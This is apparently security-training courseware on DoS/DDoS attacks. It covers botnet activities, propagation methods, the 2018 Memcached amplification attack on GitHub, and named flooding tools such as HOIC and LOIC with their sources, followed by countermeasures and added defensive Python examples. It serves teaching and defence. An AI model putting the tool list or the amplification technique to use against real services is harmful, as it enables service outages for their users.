- Spamming: Attackers use a SOCKS proxy for spamming. They harvest email addresses from web pages or other sources.
- Sniffing traffic: A packet sniffer observes the data traffic entering a compromised machine. It allows an attacker to collect sensitive information such as credit card numbers and passwords. The sniffer also allows an attacker to steal information from one botnet and use it against another botnet. In other words, botnets can rob one another.
- Keylogging: Keylogging is a method of recording the keys typed on a keyboard, and it provides sensitive information such as system passwords. Attackers use keylogging to harvest account login information for services such as PayPal.
- Spreading new malware: Botnets can be used to spread new bots.
- Installing advertisement add-ons: Botnets can be used to perpetrate a "click fraud" by automating clicks.
- Google AdSense abuse: Some companies permit showing Google AdSense ads on their websites for economic benefits. Botnets allow an intruder to automate clicks on an ad, producing a percentage increase in the click queue.
- Attacks on IRC chat networks: Also called clone attacks, these attacks are similar to a DDoS attack. A master agent instructs each bot to link to thousands of clones within an IRC network, which can flood the network.
- Manipulating online polls and games: Every botnet has a unique address, enabling it to manipulate online polls and games.
- Mass identity theft: Botnets can send a large number of emails while impersonating a reputable organization such as eBay. This technique allows attackers to steal information for identity theft.

The below figure illustrates how an attacker launches a botnet-based DoS attack on a target server. The attacker sets up a bot C&C center, following which they infect a machine (bot) and compromise it. Later, they use this bot to infect and compromise other vulnerable systems available in the network, resulting in a botnet. The bots (also known as zombies) connect to the C&C center and await instructions. Subsequently, the attacker sends malicious commands to the bots through the C&C center. Finally, as per the attacker's instructions, the bots launch a DoS attack on a target server, making its services unavailable to legitimate users in the network.
A Typical Botnet Setup

Figure 20.19: Botnet ecosystem
Scanning Methods for Finding Vulnerable Machines
Discussed below are scanning methods used by an attacker to find vulnerable machines in a network:

Random Scanning

In this technique, the infected machine (an attacker's machine or a zombie) probes IP addresses randomly in the target network's IP range and checks their vulnerability. On finding a vulnerable machine, it hacks and attempts to infect the vulnerable machine by installing the same malicious code installed on it. This technique generates significant traffic because many compromised machines probe and check the same IP addresses. Malware propagates quickly in the initial stage, and the speed of propagation reduces as the number of new IP addresses available decreases with time.

Hit-list Scanning

Through hit-list scanning, an attacker first collects a list of potentially vulnerable machines and then creates a zombie army. Subsequently, the attacker scans the list to find a vulnerable machine. On finding one, the attacker installs malicious code on it and divides the list in half. The attacker continues to scan one half, whereas the other half is scanned by the newly compromised machine. This process keeps repeating, causing the number of compromised machines to increase exponentially. This technique ensures

Topological Scanning

This technique uses the information obtained from an infected machine to find new vulnerable machines. An infected host checks for URLs in the hard drive of a machine that it wants to infect. Subsequently, it shortlists URLs and targets, and it checks their vulnerability. This technique yields accurate results, and its performance is similar to that of the hit-list scanning technique.

Local Subnet Scanning

In this technique, an infected machine searches for new vulnerable machines in its local network, behind a firewall, by using the information hidden in the local addresses. Attackers use this technique in combination with other scanning mechanisms.

Permutation Scanning
How Does Malicious Code Propagate?

Attackers use three techniques to propagate malicious code to newly discovered vulnerable systems.

Central Source Propagation

Figure 20.20: Central source propagation (attacker, central source, victim, next victim)
Back-chaining Propagation

In this technique, the attacker places an attack toolkit on their own system, and a copy of the attack toolkit is transferred to a newly discovered vulnerable system. The attack tools installed on the attacking machine use some special methods to accept a connection from the compromised system and then transfer a file containing the attack tools to it. Simple port listeners containing a copy of this file or full intruder-installed web servers, both of which use the Trivial File Transfer Protocol (TFTP), support this back-channel file copy.

Figure 10.21: Back-chaining propagation

Autonomous Propagation

Unlike the previously discussed mechanisms, in which an external file source transfers the attack toolkit, in autonomous propagation, the attacking host itself transfers the attack toolkit to a newly discovered vulnerable system, exactly at the time it breaks into that system.

Figure 10.22: Autonomous propagation (attacker exploits and copies code to the victim, then to the next victim)
Module Flow

DDoS Case Study

DDoS attacks are sophisticated and complex attacks based on DoS and multiple distributed attack sources. In a DDoS attack, a large number of compromised computers (zombies) interrupt or suspend network services. This section presents a case study of a DDoS attack.
DDoS Attack

In a DDoS attack, attackers use a group of compromised systems (bots or zombies) usually infected with Trojans to perform a DoS attack on a target system or network resource.

Figure 10.23: DDoS attack scenario

As shown in the figure, an anonymous hacker hosts a High Orbit Ion Cannon (HOIC) DDoS attack tool on a web server they own or on a compromised web server. The hacker then advertises the HOIC DDoS attack tool on social networking sites or search engines such as Twitter, Facebook and Google with a malicious download link.
Users who desire to perform the DDoS attack may download the HOIC DDoS attack tool by clicking on the malicious download link provided by the hacker. These users are termed "volunteers." All the volunteers connect via an anonymous IRC channel to the hacker and await instructions to proceed further. The hacker instructs the volunteers to flood the target web server (e.g., PayPal, MasterCard, and PAYBACK) with multiple requests. On receiving instructions, the volunteers act accordingly. Consequently, the target server becomes overwhelmed and stops responding to requests from even legitimate users.
Hackers Advertise Links for Downloading Botnets

(Screenshots: fake "WARNING! $1,000 Amazon Gift Card" pop-ups and a fake Mac malware warning alert used as download lures)
Use of Mobile Devices as Botnets for Launching DDoS Attacks

Unsecured Android devices are becoming the primary target for attackers to enlarge the botnet because they are vulnerable to malware. Malicious Android applications found in the Google Play store and drive-by downloads are just a few examples of infection methods. The attacker binds malicious features to a third-party Android application package (APK) file, encrypts it, and removes unwanted features and permissions before distributing the malicious package to a third-party app store such as Google Play Store. Once the victims are tricked into downloading and installing such applications, the victim's device is taken over by the attacker and integrated into the attacker's mobile botnet to perform malicious activities such as DDoS attacks and web injections.
DDoS Case Study: DDoS Attack on GitHub

Source: https://github.blog
GitHub is a renowned open-source cloud platform used as a repository by many companies, businesses, and researchers with wide areas of interest. In February 2018, GitHub encountered a devastating DDoS attack, which made its service unavailable to users for 4 min. This was the world's largest DDoS attack ever recorded.
Attack Timeline

The DDoS attack occurred on Wednesday, February 28, 2018. This volumetric DDoS attack made GitHub.com unavailable from 17:21 to 17:26 UTC and intermittently unavailable from 17:26 to 17:30 UTC. At 17:21 UTC, GitHub's network monitoring system detected an anomaly in the ratio of ingress to egress traffic, owing to a heavy inflow of data packets, and they notified the on-call engineer and others. The below figure shows inbound versus outbound throughput over transit links.

Figure 10.25: Inbound versus outbound throughput over transit links
The first portion of the attack peaked at 1.35 Tbps via 126.9 million packets per second (pps), and a second 400 Gbps spike occurred a little after 18:00 UTC. The below figure, provided by Akamai, shows inbound traffic in bits per second (bps).

Figure 10.26: Inbound traffic in bits per second (Akamai graph of all border links, Wed 28 Feb 2018 17:28:00)

Attack Mechanism
This attack was an amplification attack using a Memcached-based approach that peaked at 1.35 Tbps. The attack originated from over a thousand different autonomous system numbers (ASNs) across tens of thousands of unique endpoints. The attack worked by abusing Memcached instances that were inadvertently accessible on the public Internet with UDP support enabled. The spoofing of IP addresses allowed Memcached's responses to be targeted against another address and more data than necessary to be sent toward the target by the unspoofed source. The vulnerability due to this misconfiguration caused an amplification factor of up to 51,000, implying that up to 51 KB was sent toward the target for each byte sent by the attacker. This large amplification factor caused the devastating inflow of 1.3 Tbps data towards GitHub, interrupting its normal operations.
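As an added example (not from the EC-Council courseware), the following Python audit checks a memcached command line for the two settings that together made the abused instances usable as reflectors: UDP enabled and the socket bound beyond localhost. The -U, -l and -p options are real memcached flags; whether UDP is on when -U is absent depends on the memcached version, so that is an assumption the caller supplies.

```python
import shlex

# Assumed default (not from the page): memcached listens on TCP 11211 and on all
# interfaces unless told otherwise.
DEFAULT_PORT = 11211


def parse_memcached_args(cmdline):
    """Pull the listen-related options out of a memcached command line:
    -p (TCP port), -U (UDP port, 0 = off), -l (bind address). Both "-U 11211"
    and the joined "-U11211" spellings are accepted."""
    args = shlex.split(cmdline)
    opts = {"p": None, "U": None, "l": None}
    i = 1
    while i < len(args):
        a = args[i]
        if a in ("-p", "-U", "-l") and i + 1 < len(args):
            opts[a[1]] = args[i + 1]
            i += 2
        elif a[:2] in ("-p", "-U", "-l") and len(a) > 2:
            opts[a[1]] = a[2:]
            i += 1
        else:
            i += 1
    return opts


def audit_memcached(cmdline, udp_on_by_default=False):
    """Return the findings that, together, make an instance a Memcached amplifier:
    UDP enabled and the socket reachable from beyond loopback. An empty list means
    the instance cannot be used to reflect UDP traffic at a third party."""
    opts = parse_memcached_args(cmdline)
    findings = []

    # UDP is the amplification channel; memcached's own switch for it is -U.
    if opts["U"] is None:
        udp_port = DEFAULT_PORT if udp_on_by_default else 0
    else:
        udp_port = int(opts["U"])
    if udp_port != 0:
        findings.append(f"udp enabled on port {udp_port}")

    # -l may carry a comma-separated list; any non-loopback address exposes the socket.
    bind = opts["l"] or "0.0.0.0"
    exposed = [b.strip() for b in bind.split(",")
               if not b.strip().startswith("127.") and b.strip() != "::1"]
    if exposed:
        findings.append("bound to non-loopback address(es): " + ", ".join(exposed))

    if len(findings) == 2:
        findings.append("reflector risk: unauthenticated UDP service reachable from the network")
    return findings


if __name__ == "__main__":
    # Constructed command lines: the exposed configuration beside the corrected one.
    print(audit_memcached("memcached -m 64 -p 11211 -U 11211 -l 0.0.0.0"))
    print(audit_memcached("memcached -m 64 -p 11211 -U 0 -l 127.0.0.1"))
```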
GitHub's Response

Given the increase in inbound transit bandwidth to over 100 Gbps in one of GitHub's facilities, GitHub personnel decided to move the incoming traffic to Akamai. At 17:26 UTC, a command was initiated via GitHub's ChatOps tooling to withdraw Border Gateway Protocol (BGP) announcements over transit providers and announce AS36459, the autonomous system belonging to GitHub, exclusively over GitHub's links to Akamai. Routes reconverged in the next few minutes, and access control lists mitigated the attack at their border. The monitoring of transit bandwidth levels and load balancer response codes indicated a full recovery at 17:30 UTC. At 17:34 UTC, routes to Internet exchanges were withdrawn as a follow-up to shift an additional 40 Gbps away from GitHub's network.
Figure 20.27: Inbound versus outbound throughput over transit links

After this incident, GitHub revealed that they were investigating the use of their monitoring infrastructure to automate DDoS mitigation providers and would continue to measure response times to similar incidents with a goal of reducing the mean time to recovery (MTTR).
Module Flow

DoS/DDoS Attack Tools

This section deals with various DoS/DDoS attack tools used to take over a single or multiple network systems to exhaust their computing resources or render them unavailable to their intended users.
DoS/DDoS Attack Tools

High Orbit Ion Cannon (HOIC)
Source: https://sourceforge.net

HOIC is a network stress and DoS/DDoS attack application written in BASIC language. It is designed to attack up to 256 target URLs simultaneously. It sends HTTP POST and GET requests to a computer that uses lulz-inspired GUIs. Its features are summarized as follows:
- High-speed multi-threaded HTTP flooding
- Simultaneous flooding of up to 256 websites
- Built-in scripting system to allow the deployment of "boosters," which are scripts designed to thwart DDoS countermeasures and increase DoS output
- Portability to Linux/Mac with a few bug fixes
- Ability to select the number of threads in an ongoing attack
- Ability to throttle attacks individually with three settings: LOW, MEDIUM, and HIGH
Figure 10.28: Screenshot of HOIC DoS attack tool
Low Orbit Ion Cannon (LOIC)
Source: https://sourceforge.net

LOIC is a network stress testing and DoS attack application. LOIC attacks can be called application-based DoS attacks because they primarily target web applications. LOIC can be used on a target site to flood the server with TCP packets, UDP packets, or HTTP requests with the intention of disrupting the service.

Figure 10.2: Screenshot of LOIC DoS attack tool
The following are some of the additional DoS/DDoS attack tools:
- XOIC (http://anonhacktivism.blogspot.com)
- HULK (https://siberianlaika.ru)
- Tor's Hammer (https://sourceforge.net)
- Slowloris (https://github.com)
- PyLoris (https://sourceforge.net)
- R-U-Dead-Yet (https://sourceforge.net)
DoS and DDoS Attack Tools for Mobiles

Figure 10.30: Screenshot of LOIC DoS attack tool for mobile
AnDOSid
Source: https://andosid.droidinformer.org

AnDOSid allows the attacker to simulate a DoS attack (an HTTP POST flood attack to be precise) and DDoS attack on a web server from mobile phones.

Figure 10.2: Screenshot of Packets Generator tool for mobile
Module Flow

Countermeasures

DoS/DDoS is one of the foremost security threats on the Internet; thus, there is a great necessity for solutions to mitigate these attacks. This section discusses detection methods, various preventive measures, and responses to DoS/DDoS attacks.
Detection Techniques

(Slide: Activity Profiling; Sequential Change-Point Detection; Wavelet-Based Signal Analysis)

Early detection techniques help prevent DoS/DDoS attacks. Detecting a DoS/DDoS attack is a tricky task. A DoS/DDoS attack traffic detector needs to distinguish between a genuine and a bogus data packet, which is not always possible. Therefore, the techniques employed for this purpose are not perfect. There is always a chance of confusion between traffic generated by a legitimate network user and traffic generated by a DoS/DDoS attack. Detection techniques are

One problem in filtering bogus traffic from legitimate traffic is the volume of traffic. It is impossible to scan each data packet to ensure security from a DoS/DDoS attack. All the detection techniques used today define an attack as an abnormal and noticeable deviation in network traffic statistics and characteristics. These techniques involve the statistical analysis of deviations to categorize malicious and genuine traffic. The following are the three types of detection techniques:
Activity Profiling

Activity profiling is performed based on the average packet rate for network flow, which consists of consecutive packets with similar packet header information. The packet header information includes the IP addresses of the destination and sender, ports, and transport protocols used. An attack is indicated by
- An increase in activity levels among the network flow clusters
- An increase in the overall number of distinct clusters (DDoS attack)
For a higher average packet rate or activity level of a flow, the time between consecutive matching packets is lower. Randomness in the average packet rate or activity level can indicate suspicious activity. The entropy calculation method measures randomness in activity levels. If a network is under attack, the entropy of network activity levels increases.

One of the major hurdles in the activity profiling method is the huge volume of traffic. This problem can be overcome by clustering packet flows with similar characteristics. Because DoS attacks generate a large number of data packets that are very similar, an increase in the average packet rate or an increase in the diversity of packets could indicate a DoS attack.
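The two indicators above (activity levels among flow clusters and the entropy of those levels) worked through in code; this is an added example with constructed sample traffic, not part of the courseware. Flows are clustered on the header fields the text names; the window length, entropy margin and cluster factor are assumed thresholds.

```python
import math
from collections import Counter

# Constructed sample traffic: (timestamp_s, src_ip, dst_ip, dst_port, proto). The baseline
# is three ordinary client flows at modest, varied rates inside a 5-second window.
BASELINE = [
    (0.0, "10.0.0.5", "192.0.2.10", 443, "tcp"),
    (1.5, "10.0.0.5", "192.0.2.10", 443, "tcp"),
    (3.0, "10.0.0.5", "192.0.2.10", 443, "tcp"),
    (0.4, "10.0.0.7", "192.0.2.10", 80, "tcp"),
    (2.9, "10.0.0.7", "192.0.2.10", 80, "tcp"),
    (0.2, "10.0.0.9", "192.0.2.20", 53, "udp"),
    (0.3, "10.0.0.9", "192.0.2.20", 53, "udp"),
    (0.5, "10.0.0.9", "192.0.2.20", 53, "udp"),
    (0.6, "10.0.0.9", "192.0.2.20", 53, "udp"),
    (0.9, "10.0.0.9", "192.0.2.20", 53, "udp"),
]
# Constructed flood: twenty distinct sources, two near-identical packets each, one server port.
FLOOD = [(0.1 * i, f"198.51.100.{i}", "192.0.2.10", 80, "tcp")
         for i in range(1, 21) for _ in range(2)]

WINDOW_SECONDS = 5.0   # assumed observation window


def flow_key(pkt):
    """Cluster packets into flows by the header fields the text names:
    sender, destination, port and transport protocol."""
    _, src, dst, dport, proto = pkt
    return (src, dst, dport, proto)


def activity_levels(packets, window=WINDOW_SECONDS):
    """Average packet rate (packets per second) of each flow over the window."""
    counts = Counter(flow_key(p) for p in packets)
    return {flow: n / window for flow, n in counts.items()}


def entropy_bits(levels):
    """Shannon entropy of how activity is spread across the flow clusters.
    Many flows at similar levels (the DDoS signature) score high."""
    total = sum(levels.values())
    if total == 0:
        return 0.0
    return -sum((r / total) * math.log2(r / total) for r in levels.values() if r > 0)


def profile(packets, window=WINDOW_SECONDS):
    """The numbers an activity profiler watches: cluster count, mean level, entropy."""
    levels = activity_levels(packets, window)
    mean_rate = sum(levels.values()) / len(levels) if levels else 0.0
    return {"clusters": len(levels), "mean_rate": mean_rate, "entropy": entropy_bits(levels)}


def is_attack(baseline, current, entropy_margin=1.0, cluster_factor=3.0):
    """Flag the window when either indicator trips: entropy of activity levels rises
    well above the baseline, or the number of distinct clusters balloons
    (margin and factor are assumed tuning values)."""
    return (current["entropy"] > baseline["entropy"] + entropy_margin
            or current["clusters"] > cluster_factor * baseline["clusters"])


if __name__ == "__main__":
    base, now = profile(BASELINE), profile(BASELINE + FLOOD)
    print(base, now, is_attack(base, now))
```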
indicates unfamiliar network activity.

Wavelet-Based Signal Analysis

A network signal consists of a time-localized data packet flow signal and background noise. Wavelet-based signal analysis filters out the input signals of anomalous traffic flow from background noise. Normal network traffic is generally low-frequency traffic. During an attack, the high-frequency components of a signal increase.
DoS/DDoS Countermeasure Strategies

- Absorbing the attack: requires preplanning and additional resources to maintain functionality
- Identify critical services while stopping noncritical ones
- Shutting down: shut down all services until the attack has subsided

Absorbing the Attack: In this strategy, additional capacity is used to absorb an attack, which requires preplanning. It also requires additional resources. One disadvantage associated with this strategy is the cost of additional resources, which is incurred even when no attacks are underway.
DDoS Attack Countermeasures

(Slide: Detect attacks; Mitigate attacks; Post-attack forensics)

Many solutions have been proposed for mitigating the effects of a DDoS attack. However, no single complete solution exists that can protect all known forms of DDoS attacks. Moreover, attackers continually devise new methods to perform DDoS attacks to bypass the security solutions employed. The following are examples of DDoS countermeasures:
- Protect secondary victims
- Neutralize handlers
- Prevent potential attacks
- Deflect attacks
- Mitigate attacks
- Post-attack forensics
Protect Secondary Victims and Detect and Neutralize Handlers

Protect Secondary Victims

Individual Users

The best method to prevent DDoS attacks is for secondary victim systems to prevent themselves from taking part in the attack. This demands intensified security awareness and prevention techniques. Secondary victims must regularly monitor their security to remain protected from DDoS agent software. It must be ensured that the system does not install any DDoS agent program; further, DDoS agent traffic must not be transferred into the network.

Antivirus and anti-Trojan software must be installed and updated regularly, as well as software patches to fix known vulnerabilities. Moreover, awareness of security issues and prevention techniques must be increased among all Internet users. It is important to disable unnecessary services, uninstall unused applications, and scan all files received from external sources. Because these tasks may appear daunting to the average web user, the core hardware and software of computing systems come with integrated mechanisms that defend against malicious code insertion. Therefore, the built-in defensive mechanisms in the core hardware and software of the systems must be properly configured and regularly updated to avoid DDoS attacks. Employing the above countermeasures will leave attackers with no DDoS attack network through which they can launch DDoS attacks.

Network Service Providers

Service providers and network administrators can adopt dynamic pricing for their network usage to charge potential secondary victims for accessing the Internet and thereby encourage them to become more active in preventing themselves from becoming a part of a DDoS attack.
Detect and Neutralize Handlers

An important method used to stop DDoS attacks is to detect and neutralize handlers. This can be achieved by network traffic analysis, neutralizing botnet handlers, and identifying spoofed source addresses. In the agent-handler DDoS attack-tool arsenal, the handler works as an intermediary for the attacker to initiate attacks. Analyzing communication protocols and traffic patterns between handlers and clients or handlers and agents can reveal the network nodes infected by the handlers. Discovering the handlers in the network and disabling them can be a quick method of disrupting the DDoS attack network. Because the number of DDoS handlers deployed in the network is much less than the number of agents, neutralizing a few handlers can possibly render multiple agents useless, thereby thwarting DDoS attacks. Furthermore, there is a reasonable probability that the spoofed source address of DDoS attack packets will not represent a valid source address of the definite sub-network. Identifying spoofed source addresses will prevent DDoS attacks with thorough comprehension of communication protocols and traffic among handlers, clients, and agents.
Prevent Potential Attacks
Egress Filtering

Egress filtering scans the headers of IP packets leaving a network. If the packets meet specifications, they can be routed out of the sub-network from which they originated. On the other hand, the packets do not reach the targeted address if they fail to meet the necessary specifications. Egress filtering ensures that unauthorized or malicious traffic never leaves the internal network.

DDoS attacks generate spoofed IP addresses. Establishing protocols to require any legitimate packet that leaves a company's network to have a source address in which the network portion matches the internal network can help mitigate attacks. A properly developed firewall for the sub-network can filter out many DDoS packets with spoofed IP source addresses.

If a web server is vulnerable to a zero-day attack known only to the underground hacker community, a server can be vulnerable even after applying all available patches. However, if the user enables egress filtering, they can save the integrity of a system by keeping the server from establishing a connection back to the attacker. This would also limit the effectiveness of many payloads used in common exploits. Outbound exposure can be restricted to the required traffic, thereby limiting the attacker's ability to connect to other systems and gain access to tools that can enable further access into the network.
Ingress Filtering

Ingress filtering is a packet filtering technique used by many Internet Service Providers (ISPs) to prevent the source address spoofing of Internet traffic. Thus, ingress filtering can indirectly combat several types of net abuse by making Internet traffic traceable to its true source. It protects against flooding attacks that originate from valid prefixes (IP addresses) and enables the originator to be traced to its true source.
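Both filters from the egress and ingress passages above in one added Python example (not the courseware's code): outbound packets must carry a source inside the internal prefix and go only to the outbound services the segment needs; inbound packets claiming an internal or non-routable source are spoofed. The internal prefix, the non-routable list and the allowed outbound ports are assumptions.

```python
import ipaddress

# Constructed example: the prefix behind this border router. Addresses here are "internal".
INTERNAL_NET = ipaddress.ip_network("203.0.113.0/24")

# Outbound exposure restricted to required traffic (assumed policy for a web server
# segment): DNS and HTTPS out, nothing else, so a compromised host cannot call home.
REQUIRED_OUTBOUND_PORTS = {53, 443}

# Source ranges that never legitimately arrive from the Internet (assumed list).
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8")]


def egress_verdict(src, dport, internal=INTERNAL_NET, allowed_ports=REQUIRED_OUTBOUND_PORTS):
    """Egress filtering: a packet may leave only if the network portion of its source
    matches the internal network, and only toward services the segment needs."""
    if ipaddress.ip_address(src) not in internal:
        return "drop: spoofed source"
    if dport not in allowed_ports:
        return "drop: outbound port not required"
    return "allow"


def ingress_verdict(src, internal=INTERNAL_NET, bogons=NON_ROUTABLE):
    """Ingress filtering: an inbound packet whose source claims to be internal or
    non-routable cannot be traced to a true source, so it is dropped."""
    addr = ipaddress.ip_address(src)
    if addr in internal:
        return "drop: internal source arriving from outside"
    if any(addr in net for net in bogons):
        return "drop: non-routable source"
    return "allow"


def filter_packets(packets):
    """Apply the filter matching each packet's direction.
    packets: iterable of (direction, src, dst, dport); returns one verdict per packet."""
    verdicts = []
    for direction, src, dst, dport in packets:
        if direction == "egress":
            verdicts.append(egress_verdict(src, dport))
        else:
            verdicts.append(ingress_verdict(src))
    return verdicts


# Constructed sample: a legitimate HTTPS request out, a spoofed-source packet trying to
# leave, an internal host calling out on an unexpected port, an ordinary inbound request,
# an inbound packet forged with an internal source, and one with a private source.
SAMPLE = [
    ("egress", "203.0.113.10", "198.51.100.7", 443),
    ("egress", "192.0.2.44", "198.51.100.7", 80),
    ("egress", "203.0.113.10", "198.51.100.9", 4444),
    ("ingress", "198.51.100.7", "203.0.113.10", 443),
    ("ingress", "203.0.113.99", "203.0.113.10", 80),
    ("ingress", "10.1.2.3", "203.0.113.10", 80),
]

if __name__ == "__main__":
    for pkt, verdict in zip(SAMPLE, filter_packets(SAMPLE)):
        print(pkt, "->", verdict)
```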
TCP Intercept

TCP intercept is a traffic-filtering feature in routers to protect TCP servers from a TCP SYN-flooding attack, which is a kind of DoS attack. In a SYN-flooding attack, the attacker sends a huge volume of requests to connect with unreachable return addresses. As the addresses are not reachable, the connections cannot be established and remain unresolved. This huge volume of unresolved open connections overwhelms the server and may cause it to deny service even to valid requests. Consequently, legitimate users may not be able to connect to a website, access email, use an FTP service, and so on.

In the TCP intercept mode, a router intercepts the SYN packets sent by clients to a server and matches them with an extended access list. If a match is obtained, then on behalf of the destination server, the intercept software establishes a connection with the client. Similarly, the intercept software also establishes a connection with the destination server on behalf of the client. Once the two half connections are established, the intercept software combines them transparently. Thus, the TCP intercept software prevents fake connection attempts from reaching the server by acting as a mediator between the server and client throughout the connection.
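An added simulation (not from the courseware) of the intercept behaviour just described: the router answers the SYN itself, opens the second half-connection to the server only after the client completes the handshake, and half-open entries from unreachable return addresses simply time out without the server ever seeing them. The access list, timeout and client addresses are constructed.

```python
from dataclasses import dataclass, field


@dataclass
class ProtectedServer:
    """Stand-in for the server behind the router; it only ever sees connections the
    intercept has completed with a real client."""
    accepted: list = field(default_factory=list)

    def connect(self, client):
        self.accepted.append(client)


class TcpIntercept:
    """Router-side TCP intercept: SYNs for servers on the access list are answered by
    the router; the server is contacted only once the client has ACKed."""

    def __init__(self, server, watched, timeout=30.0):
        self.server = server
        self.watched = watched        # extended access list: (dst_ip, dst_port) pairs
        self.timeout = timeout        # assumed half-open timeout in seconds
        self.half_open = {}           # client -> time the router sent its SYN-ACK
        self.spliced = []             # connections joined transparently to the server
        self.timed_out = 0
        self.passed_through = 0

    def on_syn(self, client, dst, now):
        if dst not in self.watched:           # no ACL match: not intercepted
            self.passed_through += 1
            return "forward"
        self.half_open[client] = now          # router replies SYN-ACK for the server
        return "syn-ack"

    def on_ack(self, client, now):
        if client not in self.half_open:
            return "reset"                    # ACK with no handshake in progress
        del self.half_open[client]
        self.server.connect(client)           # second half-connection, opened for the client
        self.spliced.append(client)
        return "spliced"

    def expire(self, now):
        """Drop half-open entries older than the timeout; returns how many were dropped."""
        stale = [c for c, t in self.half_open.items() if now - t > self.timeout]
        for c in stale:
            del self.half_open[c]
        self.timed_out += len(stale)
        return len(stale)


def simulate_syn_flood(spoofed=500, legitimate=3):
    """Constructed scenario: a burst of SYNs from unreachable return addresses that never
    ACK, mixed with a few real clients. Returns what the server and the intercept table
    end up seeing once the timeout has passed."""
    server = ProtectedServer()
    icpt = TcpIntercept(server, watched={("192.0.2.10", 80)})
    for i in range(spoofed):
        icpt.on_syn(("198.51.100.%d" % (i % 250 + 1), 40000 + i), ("192.0.2.10", 80), now=0.0)
    for j in range(legitimate):
        client = ("203.0.113.%d" % (j + 1), 50000 + j)
        icpt.on_syn(client, ("192.0.2.10", 80), now=1.0)
        icpt.on_ack(client, now=1.1)
    icpt.expire(now=60.0)
    return {"server_saw": len(server.accepted),
            "half_open_left": len(icpt.half_open),
            "timed_out": icpt.timed_out}


if __name__ == "__main__":
    print(simulate_syn_flood())
```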
Rate Limiting

Rate limiting is a technique used to control the rate of outbound or inbound traffic of a network interface controller. This technique effectively reduces the high volume of inbound traffic that causes a DDoS attack. It is especially important to employ this technique in hardware appliances, in which the technique is configured to limit the rate of requests on layers 4 and 5 of the Open Systems Interconnection (OSI) model.
Deflect Attacks

Systems set up with limited security, also known as honeypots, act as enticement for an attacker. Recent research reveals that a honeypot can imitate all aspects of a network, including its web servers, mail servers, and clients. Honeypots are intentionally set up with low security to gain the attention of DDoS attackers and serve as a means for gaining information about attackers, attack techniques, and tools by storing a record of the system activities. DDoS attackers attracted by a honeypot install handlers or agent code within the honeypot. This avoids compromising systems that are more sensitive. Honeypots not only protect the actual system from attackers but also keep track of details on the attackers' activities by recording the activity information. Consequently, the honeypot owner can keep a record of the handler and/or agent activity. Users can employ this knowledge to defend against any future DDoS installation attacks. A defense-in-depth approach with Internet Protocol Security (IPSec) can be used at different network points to divert suspicious DoS traffic to several honeypots.

There are two different types of honeypots:
- Low-interaction honeypots
- High-interaction honeypots

An example for high-interaction honeypots is a honeynet. Honeynets form the security infrastructure; in other words, they simulate the complete layout of a network of computers but are originally intended for "capturing" attacks. The goal is to develop a network wherein all activities are controlled and tracked. This network contains potential victim decoys, and the network even has real computers running real applications.
▪ KFSensor

Source: http://www.keyfocus.net

KFSensor is a Windows-based honeypot intrusion detection system (IDS). It acts as a honeypot designed to attract and detect hackers and worms by simulating vulnerable system services and Trojans. By responding with an emulation of a real service, KFSensor can reveal the nature of an attack while maintaining total control and avoiding the risk of compromise. By acting as a decoy server, it can divert attacks from critical systems and provide a higher level of information than can be achieved using firewalls and a network IDS (NIDS) alone.

Figure 10.33: Screenshot of KFSensor
The following are examples for additional countermeasure (honeypot) DoS/DDoS tools:

▪ SSHHiPot (https://github.com)
▪ Artillery (https://github.com)
Mitigate Attacks

Load Balancing

Bandwidth providers can increase bandwidth on critical connections in case of a DDoS attack to prevent their servers from shutting down. Using a replicated server model provides additional failsafe protection. Replicated servers help in better load management by balancing loads on each server in a multiple-server architecture; they also increase normal network performance and mitigate the effect of a DDoS attack.

Throttling

Throttling entails the setting up of routers for server access with a logic to throttle incoming traffic levels that are safe for the server. "Min-max fair server-centric router throttles" (minimum and maximum throughput controls) help users prevent their servers from shutting down. Throttling helps in preventing damage to servers by controlling the DoS traffic. This method helps routers manage heavy incoming traffic so that the server can handle it. It also filters legitimate user traffic from fake DDoS attack traffic and can be extended to throttle DDoS attack traffic while allowing legitimate user traffic for better results.

A major limitation of this method is that it may trigger false alarms. Occasionally, it may allow malicious traffic to pass through while dropping some legitimate traffic.
Drop Requests

Another method is to drop packets when the load increases. Usually, the router or server performs this task. However, before continuing with a request, the system induces the requester to drop the request by making them solve a difficult puzzle that requires a lot of memory or computing power. Consequently, users of zombie systems detect a performance degradation and could possibly be dissuaded from taking part in transferring DDoS attack traffic.
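The puzzle-based "drop requests" idea above, as an added example that is not part of the courseware: a server hands out a hash puzzle whose cost rises with its own load, and verifies the answer with one HMAC and one hash. The difficulty scale, the 30-second lifetime and the message layout are assumptions for illustration, not a standard.

```python
import hashlib
import hmac
import os
import time

# Added example: a client puzzle (proof of work) a server can demand before it
# spends memory or CPU on a request. Everything here is constructed; the
# difficulty levels, TTL and message format are assumptions, not a standard.

PUZZLE_TTL_SECONDS = 30


def _leading_zero_bits(digest):
    """Count leading zero bits of a digest; the puzzle target is 'at least N'."""
    bits = 0
    for byte in digest:
        if byte == 0:
            bits += 8
            continue
        bits += 8 - byte.bit_length()
        break
    return bits


def _tag(server_secret, client_addr, issued, nonce, difficulty):
    """HMAC binding the puzzle to this server, client and time (prevents forgery)."""
    msg = "{}|{}|{}|{}".format(client_addr, issued, nonce, difficulty).encode()
    return hmac.new(server_secret, msg, hashlib.sha256).hexdigest()


def difficulty_for_load(load):
    """Map server load (0.0 idle .. 1.0 saturated) to required leading zero bits.
    Under normal load no puzzle is demanded, so legitimate users see no delay."""
    if load < 0.5:
        return 0
    return min(20, int((load - 0.5) * 40))


def issue_puzzle(server_secret, client_addr, difficulty, now=None):
    """Server side: hand the requester a challenge; the server stores nothing."""
    issued = int(now if now is not None else time.time())
    nonce = os.urandom(8).hex()
    return {
        "client": client_addr,
        "issued": issued,
        "nonce": nonce,
        "difficulty": difficulty,
        "tag": _tag(server_secret, client_addr, issued, nonce, difficulty),
    }


def solve_puzzle(puzzle):
    """Requester side: find a counter whose hash has enough leading zero bits.
    Expected work is about 2**difficulty hashes, so each zombie pays per request."""
    prefix = "{}|{}|".format(puzzle["nonce"], puzzle["tag"]).encode()
    counter = 0
    while True:
        digest = hashlib.sha256(prefix + str(counter).encode()).digest()
        if _leading_zero_bits(digest) >= puzzle["difficulty"]:
            return counter
        counter += 1


def verify_solution(server_secret, puzzle, solution, now=None):
    """Server side: cheap check; reject expired, forged or unsolved puzzles."""
    current = now if now is not None else time.time()
    if current - puzzle["issued"] > PUZZLE_TTL_SECONDS:
        return False
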